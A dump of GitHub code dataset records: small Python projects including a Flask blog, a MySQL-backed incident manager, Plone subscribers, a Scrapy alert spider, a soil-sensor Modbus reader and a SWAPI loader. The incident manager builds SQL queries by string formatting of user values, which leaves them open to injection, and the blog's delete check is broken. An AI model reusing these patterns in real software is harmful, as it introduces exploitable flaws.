204\n","repo_name":"michaellennox/jobber","sub_path":"server/controllers/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"11984664167","text":"from flask import Blueprint, render_template, request, flash, redirect, url_for, current_app\nfrom flask_login import login_required, current_user\nfrom werkzeug.utils import secure_filename\nfrom .models import Post, User\nfrom . import db\nimport os\n\nviews = Blueprint(\"views\", __name__)\n\n@views.route(\"/\")\ndef base():\n return render_template(\"base.html\", name=\"guest\")\n\n@views.route(\"/home\")\ndef home():\n posts = Post.query.all()\n return render_template(\"home.html\", user=current_user, posts=posts)\n\n@views.route(\"/create-post\", methods=['GET', 'POST'])\n@login_required\ndef create_post():\n if request.method == \"POST\":\n text = request.form.get('text')\n image = request.files.get('image')\n image_filename = None \n\n if not text and not image:\n flash('Post cannot be empty', category='error')\n else:\n if image:\n image_filename = secure_filename(image.filename)\n image.save(os.path.join(current_app.config['UPLOAD_FOLDER'], image_filename))\n flash('Image uploaded!', category='success')\n\n if text or image_filename: # Only create a post if there's text or an image\n post = Post(text=text, image_filename=image_filename, author=current_user.id)\n db.session.add(post)\n db.session.commit()\n flash('Post created!', category='success')\n return redirect(url_for('views.home'))\n\n return redirect(url_for('views.create_post'))\n\n return render_template('create_post.html', user=current_user)\n\n@views.route(\"/delete-post/\")\n@login_required\ndef delete_post(id):\n post = Post.query/filter_by(id=id).first()\n\n if not post:\n flash(\"Post does not exist.\", category=\"error\")\n elif current_user.id != post.id:\n flash(\"You do not have permission to delete this post.\", category=\"error\")\n else:\n db.session.delete(post)\n db.session.commit()\n flash('Post deleted', category='success')\n \n return redirect(url_for('views.home'))\n\n@views.route(\"/posts/\") # dynamic variables in routes are in <> \n@login_required\ndef posts(username):\n user = User.query.filter_by(username=username).first()\n\n if not user:\n flash(\"No user with that username exists.\", category='error')\n return redirect(url_for('views.home'))\n\n posts = user.posts\n return render_template(\"posts.html\", user=current_user, posts=posts, username=user)","repo_name":"Simran2404/blog-app-with-flask","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10974154910","text":"from typing import Union\n\n\nclass Endereco:\n def __init__(self,\n logradouro: str,\n cep: str,\n numero: Union[int, None]) -> None:\n\n self.logradouro = logradouro\n self.cep = cep\n self.numero = numero\n\n\nclass Escola:\n def __init__(self,\n nome: str,\n capacidade_para_alunos: int,\n endereco: Endereco):\n\n self.nome = nome\n self.capacidade = capacidade_para_alunos\n self.endereco = endereco\n","repo_name":"vmvuno/poo-2023-01","sub_path":"t08/escola_endereco.py","file_name":"escola_endereco.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2404753785","text":"from datetime import date, time, 
{"seq_id":"2404753785","text":"from datetime import date, time, datetime\r\n\r\nfrom app.model.logger import create_log\r\nfrom app.model.database import connect_db, execute_query, insert_query\r\n\r\n# logger = create_log('controller.log')\r\n\r\nlogger = create_log('gestor.log')\r\n\r\n\r\nclass Incidence:\r\n def __init__(self, incidence_id, title, description, username,\r\n incidence_date, category_id):\r\n self.incidence_id = incidence_id\r\n self.title = title\r\n self.description = description\r\n self.username = username\r\n self.incidence_date = incidence_date\r\n # self.fecha_alta = datetime.today()\r\n # self.fecha_alta = datetime.now()\r\n # .strftime('%Y-%m-%d %H:%M:%S')\r\n # logger.info(self.fecha_alta)\r\n self.category_id = category_id\r\n self.priority_id = 1\r\n self.technician_hours = 0\r\n self.resolve = 0\r\n # resolve starts at 0 instead of False\r\n\r\n\r\ndef insert_incidence(incidencia):\r\n incidence_id = incidencia.incidence_id\r\n title = incidencia.title\r\n description = incidencia.description\r\n username = incidencia.username\r\n incidence_date = incidencia.incidence_date\r\n category_id = incidencia.category_id\r\n priority_id = incidencia.priority_id\r\n technician_hours = incidencia.technician_hours\r\n resolve = incidencia.resolve\r\n query = \"INSERT INTO incidences \" \\\r\n \"VALUES ('{}','{}','{}',\" \\\r\n \" '{}','{}','{}','{}','{}',\" \\\r\n \"'{}' )\".format(incidence_id, title, description,\r\n username, incidence_date, category_id,\r\n priority_id, technician_hours, resolve)\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cnx.commit()\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n\r\ndef select_incidences_user(usuario) -> tuple:\r\n result_set = []\r\n\r\n query = \"SELECT t1.incidence_id, t1.title, t1.description, t1.username,\" \\\r\n \" t1.incidence_date, t5.status_name, t3.priority_name,\" \\\r\n \"t1.technician_hours, t1.resolve,t2.category_name \" \\\r\n \"FROM incidences AS t1 \" \\\r\n \"JOIN (categories AS t2, priorities AS t3, status AS t4, type_of_status AS t5)\" \\\r\n \"ON (t1.category=t2.category_id AND t1.priority=t3.priority_id \" \\\r\n \"AND t1.incidence_id=t4.incidence_id AND t4.status_id=t5.status_id) \" \\\r\n \"WHERE t1.username='{}' AND \" \\\r\n \"(t4.end_date='00/00/00 00:00:00' OR t4.status_id=6)\".format(usuario)\r\n\r\n # logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n\r\n for value in cursor:\r\n result_set.append(value)\r\n\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n return result_set\r\n\r\n\r\n
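Every statement in this module interpolates values with str.format, which breaks on quotes in the data and is open to SQL injection; a hedged sketch of the same insert using mysql-connector's placeholder binding instead (same table layout assumed; the driver escapes each value):

query = "INSERT INTO incidences VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)"
params = (incidence_id, title, description, username, incidence_date,
          category_id, priority_id, technician_hours, resolve)
cursor.execute(query, params)
cnx.commit()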
def select_open_incidences(usuario) -> tuple:\r\n result_set = []\r\n query = \"SELECT t1.incidence_id, t1.title, t1.description, t1.username,\" \\\r\n \" t1.incidence_date, t5.status_name, t3.priority_name,\" \\\r\n \"t1.technician_hours, t1.resolve,t2.category_name,t1.priority \" \\\r\n \"FROM incidences AS t1 \" \\\r\n \"JOIN (categories AS t2, priorities AS t3, status AS t4, type_of_status AS t5)\" \\\r\n \"ON (t1.category=t2.category_id AND t1.priority=t3.priority_id \" \\\r\n \"AND t1.incidence_id=t4.incidence_id AND t4.status_id=t5.status_id) \" \\\r\n \"WHERE t1.username='{}' AND \" \\\r\n \"t4.end_date='00-00-00 00:00:00' AND t4.status_id \" \\\r\n \"IN(1,2,4,5) \" \\\r\n \"order by t1.priority desc\".format(usuario)\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n\r\n for value in cursor:\r\n result_set.append(value)\r\n\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n logger.info(result_set)\r\n return result_set\r\n\r\n\r\ndef get_next_id():\r\n\r\n query = \"Select count(*) from incidences \"\r\n\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n result_set = cursor.fetchmany(1)\r\n cursor.close()\r\n last_row = result_set[0][0] + 1\r\n logger.info('last_row: {}'.format(last_row))\r\n\r\n incidence_id = ''\r\n incidence_id += 'INC_'\r\n incidence_id += str(date.today().year) + \"_\"\r\n logger.info(type(incidence_id))\r\n logger.info(incidence_id)\r\n\r\n if last_row < 10:\r\n incidence_id = incidence_id + \"000\" + str(last_row)\r\n elif last_row < 100:\r\n incidence_id = incidence_id + \"00\" + str(last_row)\r\n elif last_row < 1000:\r\n incidence_id = incidence_id + \"0\" + str(last_row)\r\n else:\r\n incidence_id = incidence_id + str(last_row)\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n logger.info(incidence_id)\r\n\r\n return incidence_id\r\n\r\n\r\ndef select_closed_incidences() -> tuple:\r\n result_set = []\r\n query = \"SELECT t1.incidence_id, t1.title, t1.description, t1.username,\" \\\r\n \" t1.incidence_date, t5.status_name, t3.priority_name,\" \\\r\n \"t1.technician_hours, t1.resolve,t2.category_name \" \\\r\n \"FROM incidences AS t1 \" \\\r\n \"JOIN (categories AS t2, priorities AS t3, status AS t4, type_of_status AS t5)\" \\\r\n \"ON (t1.category=t2.category_id AND t1.priority=t3.priority_id \" \\\r\n \"AND t1.incidence_id=t4.incidence_id AND t4.status_id=t5.status_id) \" \\\r\n \"WHERE \" \\\r\n \" t1.incidence_id IN( \" \\\r\n \"SELECT incidence_id FROM status \" \\\r\n \"WHERE status_id=6) AND t4.status_id=6\"\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n\r\n for value in cursor:\r\n result_set.append(value)\r\n\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n\r\n return result_set\r\n\r\n\r\ndef select_all_incidences() -> tuple:\r\n result_set = []\r\n query = \"SELECT t1.incidence_id, t1.title, t1.description, t1.username,\" \\\r\n \" t1.incidence_date, t5.status_name, t3.priority_name,\" \\\r\n \"t1.technician_hours, t1.resolve,t2.category_name,t4.status_id \" \\\r\n \"FROM incidences AS t1 \" \\\r\n \"JOIN (categories AS t2, priorities AS t3, status AS t4, type_of_status AS t5)\" \\\r\n \"ON (t1.category=t2.category_id AND t1.priority=t3.priority_id \" \\\r\n \"AND t1.incidence_id=t4.incidence_id AND t4.status_id=t5.status_id) \" \\\r\n \"WHERE t4.end_date ='00-00-00 00:00:00' OR t4.status_id=6 \" \\\r\n \"order by t4.status_id\"\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n\r\n for value in cursor:\r\n result_set.append(value)\r\n\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n return result_set\r\n\r\n\r\ndef update_technician_hours(incidence_id, hours):\r\n query = \"UPDATE incidences SET \" \\\r\n \"technician_hours=technician_hours+{} \" \\\r\n \"WHERE incidence_id='{}'\".format(hours, incidence_id)\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cnx.commit()\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n\r\ndef update_priority(incidence_id, priority):\r\n\r\n query = \"UPDATE incidences SET 
\" \\\r\n \"priority={} \" \\\r\n \"WHERE incidence_id='{}'\".format(priority, incidence_id)\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cnx.commit()\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n\r\n\r\ndef update_resolve(incidence_id, resolve):\r\n query = \"UPDATE incidences SET \" \\\r\n \"resolve={} \" \\\r\n \"WHERE incidence_id='{}'\".format(resolve, incidence_id)\r\n\r\n logger.info(query)\r\n\r\n cnx = connect_db()\r\n\r\n try:\r\n cursor = cnx.cursor()\r\n cursor.execute(query)\r\n cnx.commit()\r\n cursor.close()\r\n except Exception as err:\r\n logger.error(err)\r\n","repo_name":"kave06/Gestor-de-Incidencias","sub_path":"app/model/incidence.py","file_name":"incidence.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36846125684","text":"# -*- coding: utf-8 -*-\n\nfrom Acquisition import aq_chain\nfrom Products.CMFPlone.interfaces.constrains import ISelectableConstrainTypes\n\nfrom plone import api\nfrom plone.app.contenttypes.behaviors.richtext import IRichTextBehavior\nfrom plone.dexterity.utils import createContentInContainer\nfrom plone.i18n.normalizer.interfaces import IIDNormalizer\nfrom plone.portlets.interfaces import IPortletAssignmentMapping\nfrom plone.portlets.interfaces import IPortletManager\nfrom zope.component import getMultiAdapter\nfrom zope.component import getUtility\nfrom zope.component import queryUtility\nfrom zope.interface import alsoProvides\n\nfrom genweb6.core.indicators import RegistryException\nfrom genweb6.core.indicators import ReporterException\nfrom genweb6.serveistic.content.serveitic.serveitic import IInitializedServeiTIC\nfrom genweb6.serveistic.content.serveitic.serveitic import IServeiTIC\nfrom genweb6.serveistic.data.folder_structure import folder_structure\nfrom genweb6.serveistic.indicators.updating import update_indicators\nfrom genweb6.serveistic.indicators.updating import update_indicators_if_state\nfrom genweb6.serveistic.portlets.bannersportlet.bannersportlet import Assignment as BannersAssignment\nfrom genweb6.serveistic.portlets.indicadors.indicadors import Assignment as IndicadorsAssignment\nfrom genweb6.serveistic.portlets.notificacions.notificacions import Assignment as NotificacionsAssignment\nfrom genweb6.serveistic.utilities import serveistic_config\n\nimport logging\nimport unicodedata\n\nlogger = logging.getLogger(name='genweb6.serveistic.indicators')\n\n\ndef Added(content, event):\n \"\"\" MAX hooks main handler \"\"\"\n\n servei = findContainerServei(content)\n if not servei:\n # If file we are creating is not inside a servei folder\n return\n\n servei_tags = servei.subject\n addTagsToObject(servei_tags, content)\n\n\ndef initialize_servei(serveitic, event):\n # If it is a copy do not execute\n if 'copy_of_' in event.newName:\n return\n\n # Configure portlets\n assignments = get_portlet_assignments(serveitic, 'plone.leftcolumn')\n if 'banners_global' not in assignments:\n assignments['banners_global'] = BannersAssignment(banner_type=u\"Global\")\n if 'banners_local' not in assignments:\n assignments['banners_local'] = BannersAssignment(banner_type=u\"Local\")\n\n assignments = get_portlet_assignments(serveitic, 'genweb.portlets.HomePortletManager3')\n if 'notificacions' not in assignments:\n assignments['notificacions'] = NotificacionsAssignment()\n\n assignments = get_portlet_assignments(serveitic, 
'genweb.portlets.HomePortletManager4')\n if 'indicadors' not in assignments:\n assignments['indicadors'] = IndicadorsAssignment()\n\n # Create folder structure\n normalizer = getUtility(IIDNormalizer)\n for folder_data in folder_structure:\n try:\n if isinstance(folder_data[0], str):\n flattened = unicodedata.normalize('NFKD', folder_data[0]).encode('ascii', errors='ignore')\n else:\n flattened = unicodedata.normalize('NFKD', folder_data[0]).encode('ascii', errors='ignore')\n\n if normalizer.normalize(flattened) not in serveitic:\n createFolderAndContents(serveitic, folder_data)\n except:\n createFolderAndContents(serveitic, folder_data)\n\n # Mark ServeiTIC as initialized to prevent previous folder creations from\n # triggering the modify event\n alsoProvides(serveitic, IInitializedServeiTIC)\n\n # Facetas\n serveitic.es_faceta_1 = serveitic.ca_faceta_1\n serveitic.en_faceta_1 = serveitic.ca_faceta_1\n\n serveitic.es_faceta_2 = serveitic.ca_faceta_2\n serveitic.en_faceta_2 = serveitic.ca_faceta_2\n\n serveitic.es_faceta_3 = serveitic.ca_faceta_3\n serveitic.en_faceta_3 = serveitic.ca_faceta_3\n\n serveitic.es_faceta_4 = serveitic.ca_faceta_4\n serveitic.en_faceta_4 = serveitic.ca_faceta_4\n\n serveitic.es_faceta_5 = serveitic.ca_faceta_5\n serveitic.en_faceta_5 = serveitic.ca_faceta_5\n\n serveitic.es_faceta_6 = serveitic.ca_faceta_6\n serveitic.en_faceta_6 = serveitic.ca_faceta_6\n\n serveitic.es_faceta_7 = serveitic.ca_faceta_7\n serveitic.en_faceta_7 = serveitic.ca_faceta_7\n\n serveitic.es_faceta_8 = serveitic.ca_faceta_8\n serveitic.en_faceta_8 = serveitic.ca_faceta_8\n\n serveitic.reindexObject()\n\n\ndef serveiModifyAddSubjects(content, event):\n \"\"\" Servei modified handler \"\"\"\n\n pc = api.portal.get_tool(\"portal_catalog\")\n servei_tags = content.subject\n path = \"/\".join(content.getPhysicalPath())\n r_results = pc.searchResults(portal_type=('Document', 'Link', 'File'),\n path=path)\n\n for brain in r_results:\n obj = brain.getObject()\n addTagsToObject(servei_tags, obj)\n\n content.es_faceta_1 = content.ca_faceta_1\n content.en_faceta_1 = content.ca_faceta_1\n\n content.es_faceta_2 = content.ca_faceta_2\n content.en_faceta_2 = content.ca_faceta_2\n\n content.es_faceta_3 = content.ca_faceta_3\n content.en_faceta_3 = content.ca_faceta_3\n\n content.es_faceta_4 = content.ca_faceta_4\n content.en_faceta_4 = content.ca_faceta_4\n\n content.es_faceta_5 = content.ca_faceta_5\n content.en_faceta_5 = content.ca_faceta_5\n\n content.es_faceta_6 = content.ca_faceta_6\n content.en_faceta_6 = content.ca_faceta_6\n\n content.es_faceta_7 = content.ca_faceta_7\n content.en_faceta_7 = content.ca_faceta_7\n\n content.es_faceta_8 = content.ca_faceta_8\n content.en_faceta_8 = content.ca_faceta_8\n\n content.reindexObject()\n\n\ndef update_indicators_on_serveitic_deletion(obj, event):\n try:\n update_indicators_if_state(\n obj, ('published',),\n service=serveistic_config().ws_indicadors_service_id,\n indicator='servei-n')\n logger.info(\"Indicators were successfully reported\")\n except RegistryException as e:\n logger.warning(\n \"Error while loading indicator registry ({0})\".format(e))\n except ReporterException as e:\n logger.warning(\"Error while reporting indicators ({0})\".format(e))\n\n\ndef update_indicators_on_serveitic_review_state_change(obj, event):\n try:\n update_indicators(\n obj,\n service=serveistic_config().ws_indicadors_service_id,\n indicator='servei-n', after_commit=True)\n logger.info(\"Indicators were successfully reported\")\n except RegistryException as e:\n 
logger.warning(\n \"Error while loading indicator registry ({0})\".format(e))\n except ReporterException as e:\n logger.warning(\"Error while reporting indicators ({0})\".format(e))\n\n\n# --------------- helpers ---------------\n\ndef addTagsToObject(servei_tags, obj):\n tags = []\n object_tags = list(obj.subject)\n [tags.append(tag) for tag in servei_tags if tag not in object_tags]\n obj.subject = tuple(sum([object_tags, tags], []))\n obj.reindexObject()\n\n\ndef findContainerServei(content):\n for parent in aq_chain(content):\n if IServeiTIC.providedBy(parent):\n return parent\n\n return None\n\n\ndef createFolderAndContents(folder_directori, folder_data):\n # Create folder\n folder_props = {\n 'title': folder_data[0],\n 'checkConstraints': False,\n 'exclude_from_nav': folder_data[2],\n 'allow_discussion': folder_data[3]}\n if folder_data[5] is not None:\n folder_props['layout'] = folder_data[5]\n folder = createContentInContainer(folder_directori, folder_data[1], **folder_props)\n\n behavior = ISelectableConstrainTypes(folder)\n behavior.setConstrainTypesMode(1)\n behavior.setLocallyAllowedTypes(folder_data[4])\n behavior.setImmediatelyAddableTypes(folder_data[4])\n folder.reindexObject()\n\n # Create a contents\n for folder_content in folder_data[7]:\n createContentInFolder(folder, folder_content)\n\n if folder_data[6] is not None:\n folder.setDefaultPage(folder_data[6])\n\n\ndef createContentInFolder(folder_directori, folder_content):\n # Create content\n if folder_content[1] != \"Folder\":\n content_props = {\n 'title': folder_content[0],\n 'checkConstraints': False,\n 'exclude_from_nav': folder_content[2],\n 'allow_discussion': folder_content[3]}\n\n if folder_content[6] is not None:\n content_props['description'] = folder_content[6]\n\n if folder_content[7] is not None:\n content_props['text'] = IRichTextBehavior['text'].fromUnicode(folder_content[7])\n\n if folder_content[5] is not None:\n content_props['layout'] = folder_content[5]\n\n content = createContentInContainer(folder_directori, folder_content[1], **content_props)\n if folder_content[4] is not None:\n behavior = ISelectableConstrainTypes(content)\n behavior.setConstrainTypesMode(1)\n behavior.setLocallyAllowedTypes(folder_content[4])\n behavior.setImmediatelyAddableTypes(folder_content[4])\n else:\n createFolderAndContents(folder_directori, folder_content)\n\n\ndef get_portlet_assignments(context, name):\n portlet_manager = queryUtility(IPortletManager, name=name, context=context)\n return getMultiAdapter((context, portlet_manager), IPortletAssignmentMapping)\n","repo_name":"UPCnet/genweb6.serveistic","sub_path":"src/genweb6/serveistic/subscribers.py","file_name":"subscribers.py","file_ext":"py","file_size_in_byte":9262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37841022181","text":"import scrapy, smtplib\n\n\nclass SanjeshSpider(scrapy.Spider):\n name = 'sanjesh'\n allowed_domains = ['sanjesh.org']\n counter = 0\n _from = \"reminder@mostafaghanbari.ir\"\n _to = \"godhelot1@gmail.com\"\n last_message = \"\"\n\n def start_requests(self):\n print(\"start\")\n self.send_mail(self.create_mail_message('starting crawler from host', 'Hello, this is a log email from host'))\n yield scrapy.Request(url=\"http://sanjesh.org/\", callback=self.parse, dont_filter=True, errback=self.err_back)\n\n def parse(self, response):\n self.counter = self.counter + 1\n if self.counter % 12 == 0:\n self.send_mail(self.create_mail_message(f\"Hourly reminder:{self.counter / 
12}\",\n f\"Hello, checking for {self.counter / 12} hours\"))\n print(f\"response number: {self.counter}\")\n top_links = response.css('div .topLinks')\n for top in top_links:\n if 'ارشد' in top.xpath('./div[2]/h4/text()').get():\n img_new = top.xpath('./div[4]/ul/li[1]/a/img/@src').get()\n message = top.xpath('./div[4]/ul/li[1]/a/text()').get()\n if message == self.last_message:\n break\n if img_new is None:\n print(\"hey: noting\")\n self.logger.info(f\"hey: noting\")\n else:\n self.last_message = message\n print(f\"hey: have news: {message}\")\n self.logger.info(f\"hey: have news: {message}\")\n self.send_mail(self.create_mail_message('have news in sanjesh', message))\n break\n yield response.follow(url=\"http://sanjesh.org/\", callback=self.parse, dont_filter=True, errback=self.err_back)\n\n def err_back(self, failure):\n self.logger.info(f\"request failed, count:{self.counter}\")\n yield scrapy.Request(url=\"http://sanjesh.org/\", callback=self.parse, dont_filter=True, errback=self.err_back)\n\n def send_mail(self, message):\n try:\n print(\"create email instance\")\n smtp = smtplib.SMTP('localhost')\n smtp.login(self._from, '*************************************************************')\n smtp.sendmail(self._from, self._to, message)\n smtp.close()\n print(\"success\")\n except Exception as e:\n print(e)\n\n def create_mail_message(self, subject, body):\n return f\"From: {self._from}\\nTo: {self._to}\\nSubject: {subject}\\n\\n{body}\"\n","repo_name":"MostafaGhanbari9176/sanjesh-checker","sub_path":"reminder/spiders/sanjesh.py","file_name":"sanjesh.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6202380013","text":"# -*- coding: utf-8 -*-\n\nimport happybase\nfrom pymongo import MongoClient\n\nfrom settings import (\n mongo_refer_db, mongo_uri, mongo_portrait_db,\n thrift_server_ip, thrift_server_port, mongo_uri_down\n)\n\nconn_refer = MongoClient(mongo_uri, connect=False)\ndb = conn_refer[mongo_refer_db]\n\nconn = MongoClient(mongo_uri_down, connect=False)\nportrait = conn[mongo_portrait_db]\n\nhbase_pool = happybase.ConnectionPool(\n size=10, host=thrift_server_ip,\n port=thrift_server_port, timeout=5000\n)\n","repo_name":"leolinf/flask-demo","sub_path":"querier/utils/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12952663423","text":"import minimalmodbus\nimport time\n\n\nmb_address = 1 # modbus address as per manual\n\nnpk_sensor = minimalmodbus.Instrument('/dev/ttyUSB0', mb_address)\n\n# As per device specifications\nnpk_sensor.serial.baudrate = 9600\nnpk_sensor.serial.bytesize = 8\nnpk_sensor.serial.parity = minimalmodbus.serial.PARITY_NONE\nnpk_sensor.serial.stopbits = 1\nnpk_sensor.serial.timeout = 0.5\nnpk_sensor.mode = minimalmodbus.MODE_RTU\n\nnpk_sensor.clear_buffers_before_each_transaction = True\nnpk_sensor.close_port_after_each_call = True\n\n# One Register\n# single_data = npk_sensor.read_register(30, 0, 3)\n# print(f\"Raw Data is {single_data}\")\n\n# We want to constantly be getting data from the sensor\n\n# Multiple Regs\n# read_registers(register address, number of registers to be read, function code)\ndata = npk_sensor.read_registers(30, 3, 3)\n\ndef get_npk_nit():\n\tnitrogen = data[0]\n\ttime.sleep(1)\n\t\n\treturn nitrogen\n\ndef get_npk_phos():\n\tphosphorus = data[1]\n\ttime.sleep(1)\n\n\treturn phosphorus\n\ndef 
get_npk_pot():\n\tpotassium = data[2]\n\ttime.sleep(1)\n\n\treturn potassium\n\n\n","repo_name":"jawadahmed2/Plant-Health-Prediction-From-Sensors-Data","sub_path":"ceres_ydg/hw/src/sensors/NPK_CD.py","file_name":"NPK_CD.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"34675214935","text":"import requests\nimport mysql.connector\nfrom datetime import datetime\n\nconn = mysql.connector.connect(user='root', password='password', host='localhost', database='starwars')\nc = conn.cursor()\n\nurl = 'https://swapi.dev/api/species'\nwhile url:\n    response = requests.get(url)\n    data = response.json()\n    for species in data['results']:\n        created = datetime.strptime(species['created'], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n        edited = datetime.strptime(species['edited'], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n        insert_species = (\n            \"INSERT INTO species (name, classification, designation, average_height, skin_colors, hair_colors, eye_colors, average_lifespan, homeworld, language, created, edited, url) \"\n            \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n        )\n        species_data = (\n            species['name'], \n            species['classification'], \n            species['designation'], \n            species['average_height'] if species['average_height'] != 'unknown' else None, \n            species['skin_colors'], \n            species['hair_colors'], \n            species['eye_colors'], \n            species['average_lifespan'] if species['average_lifespan'] != 'unknown' else None, \n            species['homeworld'], \n            species['language'], \n            created,\n            edited,\n            species['url']\n        )\n        c.execute(insert_species, species_data)\n\n    # Get the next page URL\n    url = data['next']\n\nconn.commit()\nconn.close()\n","repo_name":"Shiido123/star-wars-python","sub_path":"species.py","file_name":"species.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"2795955045","text":"import keyboard\nfrom terminaltables import AsciiTable\n\nstock = [\n    [\"Article\", \"Pointure(EUR)\", \"Prix(€)\"],\n    [\"Asics Gel 2000\", 42, 119.00],\n    [\"Asics Gel 2000\", 39, 119.00],\n    [\"Mizuno Wave Rider\", 38, 129.00],\n    [\"Nike Air Zoom\", 42, 125.00],\n    [\"Mizuno Wave plus\", 39, 83.40],\n    [\"Mizuno Wave plus\", 40, 83.40],\n    [\"Mizuno Wave plus\", 41, 83.40],\n    [\"Merrel Poseidon\", 39, 118.30]\n]\n\n\ndef wait_for_input():\n    global inp_val, inp\n    inp = False\n    while not inp:\n        inp_val = keyboard.read_key()\n        if inp_val in (\"à\", \"&\", \"é\", '\"', \"'\", \"(\", \"-\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\"):\n            inp = True\n            break\n\n\ndef reset():\n    global inp_val\n    inp_val = \"\"\n\n\n\nrun = True\nwhile run:\n\n    print(\"\\n1 : Afficher les articles pour une pointure\"\n          \"\\n2 : Afficher les articles présents plusieurs fois\"\n          \"\\n3 : Afficher les articles pour chaque pointure\"\n          \"\\n4 : Afficher la pointure la plus présente\"\n          \"\\n5 : Afficher le nombre de fois la pointure la plus présente\"\n          \"\\n6 : Afficher l'article le plus cher\"\n          \"\\n0 : Quitter le programme\")\n\n    wait_for_input()\n\n    if inp_val == \"0\" or inp_val == \"à\":\n        print(\"\\nFin du programme ...\")\n        break\n\n    elif inp_val == \"1\" or inp_val == \"&\":\n        print(\"\\n1\")\n        reset()\n\n    elif inp_val == \"2\" or inp_val == \"é\":\n        print(\"\\n\")\n        table = AsciiTable(stock)\n        
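# NOTE: option 2 is meant to list only the articles present more than once; for now it prints the whole stock table.\n        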
print(table.table)\n        reset()\n\n    elif inp_val == \"3\" or inp_val == '\"':\n        print(\"\\n3\")\n        reset()\n    elif inp_val == \"4\" or inp_val == \"'\":\n        print(\"\\n4\")\n        reset()\n    elif inp_val == \"5\" or inp_val == \"(\":\n        print(\"\\n5\")\n        reset()\n    elif inp_val == \"6\" or inp_val == \"-\":\n        print(\"\\n6\")\n        reset()\n","repo_name":"nescapp/school-shit-21-22","sub_path":"prj1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"21098975971","text":"#Chaos program, (in chapter 1) designed to show how chaotic results can arise from simple starting conditions\r\n#By Dana Lockwood (9/28/17)\r\n\r\ndef main():#define the function\r\n    print(\"This program illustrates a chaotic function\")\r\n    x=float(input(\"Enter a number between zero and 1\"))\r\n    for i in range(10):\r\n        x=3.9 * x * (1-x) #define the equation\r\n        print(x)\r\n\r\nmain()\r\n","repo_name":"D-Bits/Python-Practice","sub_path":"Practice/9-28/chaos-program_Dana.py","file_name":"chaos-program_Dana.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"13461702776","text":"import matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\n\ndef positive_review(norm_train_reviews):\n    plt.figure(figsize=(10, 10))\n    positive_text = norm_train_reviews[1]\n    WC = WordCloud(width=1000, height=500, max_words=500, min_font_size=5)\n    positive_words = WC.generate(positive_text)\n    plt.imshow(positive_words, interpolation='bilinear')\n    plt.show()\n\ndef negative_review(norm_train_reviews):\n    plt.figure(figsize=(10, 10))\n    negative_text = norm_train_reviews[8]\n    WC = WordCloud(width=1000, height=500, max_words=500, min_font_size=5)\n    negative_words = WC.generate(negative_text)\n    plt.imshow(negative_words, interpolation='bilinear')\n    plt.show()","repo_name":"AndreasPatsimas/Movies-Data-Mining","sub_path":"sentiment_analysis/world_cloud_reviews/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
